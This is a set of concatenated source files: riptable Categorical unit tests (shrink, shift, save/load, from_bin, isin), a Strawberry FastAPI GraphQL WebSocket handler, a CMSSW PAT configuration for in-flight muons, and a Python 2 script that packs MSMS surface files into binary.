# E b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'a'], dtype='|S8')
# E y: array([b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered'],
# E dtype='|S8')
# Expected all values to be b'Filtered', but saw b'a'.
# todo assert_array_equal(shift_cat_values, np.full(cat_len, filtered_name), f"Overflow shifted Categorical values. All values are expected to be invalid '{filtered_name}'.")
assert_array_equal(
shift_cat._fa,
np.zeros(cat_len),
f"Overflow shifted Categorical underlying FastArray items. All values are expected to be invalid value 0.",
)
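# A compact illustration of the shift semantics verified above (assuming base index 1,
# where code 0 means Filtered; values are hypothetical):
#   c = Categorical(['a', 'b', 'c'])   # backing codes [1, 2, 3]
#   c.shift_cat(1)._fa                 # -> [0, 1, 2]; the first slot becomes Filtered
#   c.shift_cat(-1)._fa                # -> [2, 3, 0]; the last slot becomes Filtered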
@pytest.mark.parametrize(
# TODO - add base 0 and base 1 indexing w/ expectations
"categoricals",
[
# Categorical constructed from python list data
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_list_values",
),
# Categorical constructed from numpy array
pytest.param(
[Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_np_array_values",
),
# Categorical constructed from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray])
],
id="cat_with_rt_fastarray_values",
),
],
)
@pytest.mark.parametrize("misc", [None, "INVALID"]) # TODO - add numeric values
@pytest.mark.parametrize("inplace", [False, True])
def test_shrink(categoricals, misc, inplace):
for categorical in categoricals:
cat = categorical.copy(deep=True) # deep copy so test data remains unchanged with inplace shrinks
# Test 1 Shrink with empty values.
# Shrink to empty categories.
shrink_cat = cat.shrink([], misc=misc, inplace=inplace)
# Type is preserved after shrinking.
assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical."
if misc is None:
# For base index 1 Categorical, the underlying FastArray should be all zeros.
assert_array_equal(shrink_cat._fa, np.zeros(len(cat)))
# The Categorical categories should be empty.
expected_category_array = np.empty(0)
assert_array_equal(
shrink_cat.category_array, expected_category_array, f"Category array should be empty.",
)
for arr in shrink_cat.category_dict.values():
assert_array_equal(
arr, expected_category_array, f"Category dictionary values should be empty.",
)
# TODO expanding a shrunk categorical does not return the original type's invalid value; instead it returns nans
# N.B., when shrinking, the category array type changes to float64
# E x: FastArray([nan])
# E y: array([b'Filtered'], dtype='|S8')
# assert_array_equal(shrink_cat.expand_array, np.full(len(cat), filtered_name), f"Given empty values, shrink categorical values should all be invalid '{filtered_name}'.")
else: # single categories being the specified misc
# TODO - consider any constraints to assert on for the dtype?
# The invalid value based on the dtype: e.g., for U32 its -2147483646
# assert_array_equal(shrink_cat._fa, InvalidValuesForDtype)
# assert_array_equal(shrink_cat.expand_array, InvalidValuesForDtypeExpanded)
# The categories should only contain the misc value.
expected_category_array = np.array(misc)
assert_array_equal(
shrink_cat.category_array,
expected_category_array,
f"Category array should only contain the '{misc}' category.",
)
for arr in shrink_cat.category_dict.values():
assert_array_equal(
arr,
expected_category_array,
f"Category dictionary values should only contain the '{misc}' category.",
)
# Test 2 Shrink with same categories
cat = categorical.copy(deep=True)
# Shrink to all the same categories.
shrink_cat = cat.shrink(cat.category_array, misc=misc, inplace=inplace)
# Type is preserved after shrinking.
assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical."
if misc is None: # TODO handle the misc not None case
shrink_cat_values, cat_values = shrink_cat.expand_array, cat.expand_array
assert_array_equal(shrink_cat_values, cat_values)
assert_array_equal(shrink_cat._fa, cat._fa)
assert_array_equal(shrink_cat.category_array, cat.category_array)
for arr, expected_arr in zip(shrink_cat.category_dict.values(), cat.category_dict.values()):
assert_array_equal(arr, expected_arr)
# TODO Test 3 Shrink with subset of categories
cat = categorical.copy(deep=True)
# Shrink to all the same categories.
n = int(len(cat) / 2)
shrink_cat = cat.shrink(cat.category_array[:n], misc=misc, inplace=inplace)
# Type is preserved after shrinking.
assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical."
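# A hedged sketch of the behavior exercised above, using only the keyword names from
# this test; the exact outputs are assumptions rather than documented guarantees:
#   c = Categorical(['a', 'a', 'b', 'c'])
#   c.shrink(['a'])                   # rows in dropped categories map to the Filtered code 0
#   c.shrink(['a'], misc='OTHER')     # or collapse into a single catch-all 'OTHER' category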
@pytest.mark.parametrize(
"categoricals",
[
# TODO - test categorical construction using numpy and riptable arrays as a separate test
# Categorical constructed from python list data
pytest.param([Categorical(data) for data in get_categorical_data_factory_method()], id="cat_with_list_values",),
# Categorical constructed from numpy array
pytest.param(
[
Categorical(np.array(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_np_array_values",
),
# Categorical constructed from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_rt_fastarray_values",
),
],
)
def test_sds(categoricals, tmpdir):
dir = tmpdir.mkdir("test_categorical_sds")
for i, cat in enumerate(categoricals):
name = "categorical_" + str(i)
p = str(dir.join(name))
save_sds(p, cat)
cat2 = load_sds(p)
# Test 1 Saved and loaded categoricals should be the same.
# TODO vary the meta version optional parameter when calling Categorical._load_from_sds_meta_data
assert isinstance(cat2, Categorical)
assert_array_equal(cat2._fa, cat._fa)
if not cat.ismultikey: # MultiKey Categorical's do not support category_array operation
assert_array_equal(cat2.category_array, cat.category_array)
for actual, expected in zip(cat2.category_dict.values(), cat.category_dict.values()):
assert_array_equal(actual, expected)
cat2_values, cat_values = cat2.expand_array, cat.expand_array
assert_array_equal(cat2_values, cat_values)
# Test 2 As and from meta data Categoricals should be the same.
cat3 = Categorical._from_meta_data(*cat._as_meta_data(name=name))
# Saved and loaded categoricals should be the same.
assert isinstance(cat3, Categorical)
assert_array_equal(cat3._fa, cat._fa)
if not cat.ismultikey: # MultiKey Categorical's do not support category_array operation
assert_array_equal(cat3.category_array, cat.category_array)
for actual, expected in zip(cat3.category_dict.values(), cat.category_dict.values()):
assert_array_equal(actual, expected)
cat3_values, cat_values = cat3.expand_array, cat.expand_array
assert_array_equal(cat3_values, cat_values)
@pytest.mark.parametrize(
"categoricals",
[
# TODO handle CategoryMode IntEnum and Default
[
Categorical(data)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
]
+ [
Categorical(data, base_index=0)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
]
],
)
def test_from_bin(categoricals):
for cat in categoricals:
cat_arr_len = len(cat.category_array)
# Test 1 All bin values are in the category array.
if cat.base_index == 0:
for i in range(cat_arr_len):
assert cat.from_bin(i) in cat.category_array
elif cat.base_index == 1:
for i in range(1, cat_arr_len + 1):
assert cat.from_bin(i) in cat.category_array
else:
raise ValueError(f"Unhandled Categorical base index {cat.base_index}")
# Test 2 Handling of invalid input types: base_index and bin.
# The bin is not an integer.
with pytest.raises(TypeError):
cat.from_bin(str(i))
cat.from_bin(float(i))
# Bin value out of range.
with pytest.raises(ValueError):
cat.from_bin(-1)
if cat.base_index == 0:
cat.from_bin(cat_arr_len)
elif cat.base_index == 1:
cat.from_bin(0)
cat.from_bin(cat_arr_len + 1)
else:
raise ValueError(f"Unhandled Categorical base index {cat.base_index}")
# The base index is None.
cat.grouping._base_index = None
with pytest.raises(TypeError):
cat.from_bin(1)
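# A short illustration of the range rules checked above (assuming the default base
# index 1, where bin 0 is reserved for Filtered; values are hypothetical):
#   c = Categorical(['a', 'b', 'c'])
#   c.from_bin(1)    # -> b'a' (string categories default to byte strings here)
#   c.from_bin(0)    # raises ValueError: bin 0 is the Filtered slot for base index 1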
@pytest.mark.parametrize("cat", get_all_categorical_data())
def test_argsort(cat):
assert_array_equal(
cat.argsort(),
np.argsort(cat._fa),
"Categorical argsort should be equivalent to the argsort of the underlying FastArray",
)
@pytest.mark.parametrize(
"cats",
[
pytest.param(
[
Categorical(data)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
]
),
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method(CategoryMode.MultiKey)],
marks=[
pytest.mark.xfail(reason="NotImplementedError: Add categories not supported for MultiKey Categoricals")
],
),
],
) # TODO parameterize across base index 0 and 1
def test_auto_add(cats):
for cat in cats:
alpha, beta = "alpha", "beta"
first_index, last_index = 0, len(cat) - 1
# Test 1 auto_add_on will allow addition of a category if the Categorical is unlocked,
# otherwise an error is raised.
cat.auto_add_on()
cat.unlock() # Categorical is unlocked
# Test 1.1 When unlocked and attempting to add a category, the categories should be added.
# set the first and last categories
cat[first_index] = cat[last_index] = alpha
# auto_add_on and unlock should not allow setting beyond the first and last index of categories
with pytest.raises(IndexError): # index out of bounds
cat[first_index - 1] = alpha
cat[last_index + 1] = alpha
# category is added at specified index
first_category = cat.category_array[cat._fa[first_index] - 1]
# TODO normalize the category_array value, which is sometimes a numpy str_ or bytes_, to ascii and compare
# assert cat.category_array[cat._fa[first_index]-1] == alpha
# assert cat.category_array[cat._fa[last_index]-1] == alpha
# added category is in category array and dictionary
assert alpha in cat.category_array
for categories in cat.category_dict.values():
assert alpha in categories
# Test 1.2 When locked and attempting to add a category, an error is raised and the categories should not be added.
cat.lock() # Categorical is locked
with pytest.raises(IndexError): # cannot add a category since index is locked
cat[first_index] = beta
assert beta not in cat.category_array
for categories in cat.category_dict.values():
assert beta not in categories
# Test 2 auto_add_off will prevent category assignment of non-existing categories and raise an error
cat.auto_add_off()
# Test 2.1 Unlocked case
cat.unlock() # Categorical is unlocked
with pytest.raises(ValueError): # cannot automatically add categories while auto_add_categories is False
cat[first_index] = beta
# Test 2.2 Locked case
cat.lock()
with pytest.raises(IndexError): # cannot add a category since index is locked
cat[first_index] = beta
@pytest.mark.xfail(reason="rt_numpy.unique() needs to handles multikey categoricals")
def test_multikey_categorical_unique():
c = Categorical([arange(3), FA(list('abc'))])
assert len(c.unique()) == c.nunique()
@pytest.mark.parametrize("values", [list_bytes, list_unicode, list_true_unicode])
def test_categorical_convert(values):
categories = list(set(values))
# pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c = pd.Categorical(values, categories=categories[:-1])
# The output of categorical_convert, when applied to a pandas Categorical, can be used to
# construct a riptable Categorical. We test that this handles missing categories correctly.
rt_values, rt_categories = rt.categorical_convert(pd_c)
cat = rt.Categorical(rt_values, categories=rt_categories)
# The invalid category should not be in the Categorical.
missing_category = categories[-1]
assert missing_category not in cat
assert missing_category not in cat._categories
assert missing_category not in cat.category_array
assert missing_category not in cat.category_dict[next(iter(cat.category_dict))] # values of first key
# All other category values should be in the Categorical.
for e in categories[:-1]:
# assert e in cat # uncomment when test_categorical_convert_xfail is fixed
assert e in cat._categories
assert e in cat.category_array
assert e in cat.category_dict[next(iter(cat.category_dict))] # values of first key
@pytest.mark.xfail(reason="RIP-396 - category not in Categorical, but is in Categorical.category_array")
@pytest.mark.parametrize("values", [list_bytes,])
def test_categorical_convert_xfail(values):
categories = list(set(values))
# pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c = pd.Categorical(values, categories=categories[:-1])
rt_values, rt_categories = rt.categorical_convert(pd_c)
cat = rt.Categorical(rt_values, categories=rt_categories)
# All other category values should be in the Categorical.
for e in categories[:-1]:
assert e in cat
def test_build_dicts_enum():
str_to_int, int_to_str = Categories.build_dicts_enum(LikertDecision)
codes = list(str_to_int.values()) * 2
c = Categorical(codes, categories=LikertDecision)
c2 = Categorical(codes, categories=str_to_int)
c3 = Categorical(codes, categories=int_to_str)
# c is our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_enum
# should construct the same Categorical as c.
assert_array_equal(c, c2)
assert_array_equal(c, c3)
@pytest.mark.parametrize("values", [list("abcdef"), [b"a", b"b", b"c", b"d", b"e", b"f"]])
def test_build_dicts_python(values):
# int
d = {k: v for k, v in enumerate(values)}
str_to_int, int_to_str = Categories.build_dicts_python(d)
codes = list(d.keys()) * 2
c = Categorical(codes, categories=d)
c2 = Categorical(codes, categories=str_to_int)
c3 = Categorical(codes, categories=int_to_str)
# c is our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_python
# should construct the same Categorical as c.
assert_array_equal(c, c2)
assert_array_equal(c, c3)
@pytest.mark.parametrize(
"a,b,a_in_b,b_in_a",
[
pytest.param(Cat(list('abc')), Cat(list('a')), FA([True, False, False]), FA([True]), id='single_key_overlap'),
pytest.param(
Cat([FA(list('abc')), FA([1,2,3])]),
Cat([FA(list('a')), FA([1])]),
FA([True, False, False]),
FA([True]),
id='single_multikey_overlap'
),
pytest.param(
Cat([FA(list('abc')), FA([1,2,3])]),
Cat([FA(list('ab')), FA([1,2])]),
FA([True, True, False]),
FA([True, True]),
id='two_multikey_overlap'
),
pytest.param(
Cat([FA(list('abcde')), FA([1,2,3,4,5])]),
Cat([FA(list('dc')), FA([4,5])]),
FA([False, False, False, True, False]),
FA([True, False]),
id='single_multikey_overlap2'
),
pytest.param(
Cat([FA(list('abcde')), FA([1,2,3,4,5])]),
Cat([FA(list('aba')), FA([1,2,1])]),
FA([True, True, False, False, False]),
FA([True, True, True]),
id='repeated_key_multikey_overlap'
),
pytest.param(
Cat([FA(list('abcdeab')), FA([1,2,3,4,5,1,6])]),
Cat([FA(list('aba')), FA([1, 2, 1])]),
FA([True, True, False, False, False, True, False]),
FA([True, True, True]),
id='repeated_key_multikey_overlap2'
),
]
)
def test_multikey_categorical_isin(a, b, a_in_b, b_in_a):
assert_array_equal(a_in_b, a.isin(b))
assert_array_equal(b_in_a, b.isin(a))
# TODO this is a good candidate for a hypothesis test once the CategoricalStrategy is able to generate MultiKey Categoricals
f_msg = 'expected to be consistent with cat1.as_singlekey().isin(cat2.as_singlekey()) operation.'
assert_array_equal(a.as_singlekey().isin(b.as_singlekey()), a.isin(b), f_msg)
assert_array_equal(b.as_singlekey().isin(a.as_singlekey()), b.isin(a), f_msg)
_make_unique_test_cases = pytest.mark.parametrize('cat, expected', [
(rt.Cat([1, 1, 2, 2], ['a', 'a']), rt.Cat([1, 1, 1, 1], ['a'])),
(rt.Cat([2, 2, 2, 2], ['a', 'a']), rt.Cat([1, 1, 1, 1], ['a'])),
(rt.Cat([1, 2, 3, 3], ['a', 'a', 'b']), rt.Cat([1, 1, 2, 2], ['a', 'b'])),
(rt.Cat([0, 0, 1, 1], ['a', 'a'], base_index=0), rt.Cat([0, 0, 0, 0], ['a'], base_index=0)),
(rt.Cat([1, 1, 1, 1], ['a', 'a'], base_index=0), rt.Cat([0, 0, 0, 0], ['a'], base_index=0)),
(rt.Cat([0, 0, 1, 1], ['a', 'b'], base_index=0), rt.Cat([0, 0, 1, 1], ['a', 'b'], base_index=0)),
(rt.Cat([1, 1, 2, 2, 3], [99, 99, 101], ), rt.Cat([1, 1, 1, 1, 2], [99, 101])),
(rt.Cat([0, 0, 1, 1], [99, 99], base_index=0), rt.Cat([0, 0, 0, 0], [99], base_index=0)),
(rt.Cat([0, 0, 1, 1], [99, 101], base_index=0), rt.Cat([0, 0, 1, 1], [99, 101], base_index=0)),
(rt.Cat([0, 0, 1, 1, 2, 2], ['a', 'a'], ), rt.Cat([0, 0, 1, 1, 1, 1], ['a'], )),
(rt.Cat([0, 0, 1, 1, 2, 2, 3, 3], ['a', 'a', 'b'], ), rt.Cat([0, 0, 1, 1, 1, 1, 2, 2], ['a', 'b'], )),
])
@_make_unique_test_cases
def test_category_make_unique_not_inplace(cat, expected):
res = cat.category_make_unique()
assert (res == expected).all()
@pytest.mark.parametrize('base_index', [0, 1])
def test_category_make_unique_multikey(base_index):
c1 = Categorical(np.arange(10) % 2, ['a', 'a'], base_index=base_index)
c2 = Categorical(np.arange(10) % 3, ['a', 'b', 'c'], base_index=base_index)
cat = Categorical([c1, c2], base_index=base_index)
res = cat.category_make_unique()
assert list(cat) == list(res)
|
strawberry/fastapi/handlers/graphql_ws_handler.py | TheVinhLuong102/Strawberry | 2,062 | 12687262 | from typing import Any
from strawberry.asgi.handlers import GraphQLWSHandler as BaseGraphQLWSHandler
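# Note on this adapter (assumption: _get_context and _get_root_value are awaitable
# callables injected by the FastAPI GraphQL router): the subclass simply forwards
# context/root-value resolution to them so the base ASGI WebSocket handler can be
# reused unchanged.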
class GraphQLWSHandler(BaseGraphQLWSHandler):
async def get_context(self) -> Any:
return await self._get_context()
async def get_root_value(self) -> Any:
return await self._get_root_value()
|
PhysicsTools/PatAlgos/test/patTuple_addDecayInFlight_cfg.py | ckamtsikis/cmssw | 852 | 12687280 | <gh_stars>100-1000
## import skeleton process
from PhysicsTools.PatAlgos.patTemplate_cfg import *
#process.Tracer = cms.Service("Tracer")
# load the PAT config
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
patAlgosToolsTask.add(process.patCandidatesTask)
# Temporary customization for unit tests that fail due to old input samples
process.patTaus.skipMissingTauID = True
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
patAlgosToolsTask.add(process.selectedPatCandidatesTask)
## add inFlightMuons
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
process.inFlightMuons = cms.EDProducer("PATGenCandsFromSimTracksProducer",
src = cms.InputTag("g4SimHits"), ## use "fastSimProducer" for FastSim
setStatus = cms.int32(-1),
particleTypes = cms.vstring("mu+"), ## picks also mu-, of course
filter = cms.vstring("pt > 0.5"), ## just for testing
makeMotherLink = cms.bool(True),
writeAncestors = cms.bool(True), ## save also the intermediate GEANT ancestors of the muons
genParticles = cms.InputTag("genParticles"),
)
patAlgosToolsTask.add(process.inFlightMuons)
process.out.outputCommands.append('keep *_inFlightMuons_*_*')
## prepare several clones of match associations for status 1, 3 and in flight muons (status -1)
process.muMatch3 = process.muonMatch.clone(mcStatus = cms.vint32( 3))
patAlgosToolsTask.add(process.muMatch3)
process.muMatch1 = process.muonMatch.clone(mcStatus = cms.vint32( 1))
patAlgosToolsTask.add(process.muMatch1)
process.muMatchF = process.muonMatch.clone(mcStatus = cms.vint32(-1),matched = cms.InputTag("inFlightMuons"))
patAlgosToolsTask.add(process.muMatchF)
process.patMuons.genParticleMatch = cms.VInputTag(
cms.InputTag("muMatch3"),
cms.InputTag("muMatch1"),
cms.InputTag("muMatchF"),
)
## dump event content
process.content = cms.EDAnalyzer("EventContentAnalyzer")
## ------------------------------------------------------
# In addition you usually want to change the following
# parameters:
## ------------------------------------------------------
#
# process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions)
# ##
## switch to RECO input
from PhysicsTools.PatAlgos.patInputFiles_cff import filesRelValTTbarGENSIMRECO
process.source.fileNames = filesRelValTTbarGENSIMRECO
# ##
process.maxEvents.input = 10
# ##
# process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py)
# ##
process.out.fileName = 'patTuple_addDecayInFlight.root'
# ##
# process.options.wantSummary = False ## (to suppress the long output at the end of the job)
|
scripts/msms2bin.py | CyrusBiotechnology/pv | 272 | 12687283 | #!/usr/bin/env python
"""
Converts the MSMS .vert/.face pair into a compact binary format optimized for
file size.
"""
import sys
import os
from struct import pack
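# Binary layout produced below (all fields big-endian, per the '!' struct format):
# a uint32 format version, then a uint32 vertex count followed by six float32
# values (x, y, z, nx, ny, nz) per vertex, then a uint32 face count followed by
# three uint32 vertex indices per face.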
def print_usage(code=0):
print 'usage: msms2bin.py <input> [output]'
print ' input may either point to the .vert or .face file generated by msms'
print ' when the output filename is omitted, it defaults to input.bin with'
print ' the file extension removed, e.g. surface.vert -> surface.bin'
sys.exit(code)
def exchange_extension(filename, new_ext):
return '%s.%s' % (os.path.splitext(filename)[0], new_ext)
def check_exists(filename):
if not os.path.exists(filename):
print '"%s" does not exists' % filename
return False
return True
def check_readable(filename):
if not check_exists(filename):
return False
if not os.access(filename, os.R_OK):
print '"%s" is not readable' % filename
return False
return True
def read_and_pack_vert(filename, out_fd):
with open(filename, 'rb') as verts:
header = True
data = bytes()
for line in verts:
line = line.strip()
if line.startswith('#'):
continue
if len(line) == 0:
continue
if header:
num_verts = int(line.split()[0])
out_fd.write(pack('!I', num_verts))
header = False
continue
x, y, z, nx, ny, nz = line.split()[:6]
data += pack('!ffffff', float(x), float(y), float(z),
float(nx), float(ny), float(nz))
out_fd.write(data)
def read_and_pack_faces(filename, out_fd):
with open(filename, 'rb') as faces:
header = True
data = bytes()
for line in faces:
line = line.strip()
if line.startswith('#'):
continue
if len(line) == 0:
continue
if header:
num_faces = int(line.split()[0])
out_fd.write(pack('!I', num_faces))
header = False
continue
idx0, idx1, idx2 = line.split()[:3]
data += pack('!III', int(idx0), int(idx1), int(idx2))
out_fd.write(data)
def main(args):
BIN_VERSION = 1
if len(args) < 2:
print_usage(-1)
vert_filename = exchange_extension(args[1], 'vert')
face_filename = exchange_extension(args[1], 'face')
output_filename = exchange_extension(args[1], 'bin')
if len(args) == 3:
output_filename = args[2]
if not check_readable(vert_filename) or not check_readable(face_filename):
sys.exit(-1)
with open(output_filename, 'wb') as out_file:
out_file.write(pack('!I', BIN_VERSION))
read_and_pack_vert(vert_filename, out_file)
read_and_pack_faces(face_filename, out_file)
if __name__ == '__main__':
main(sys.argv)
|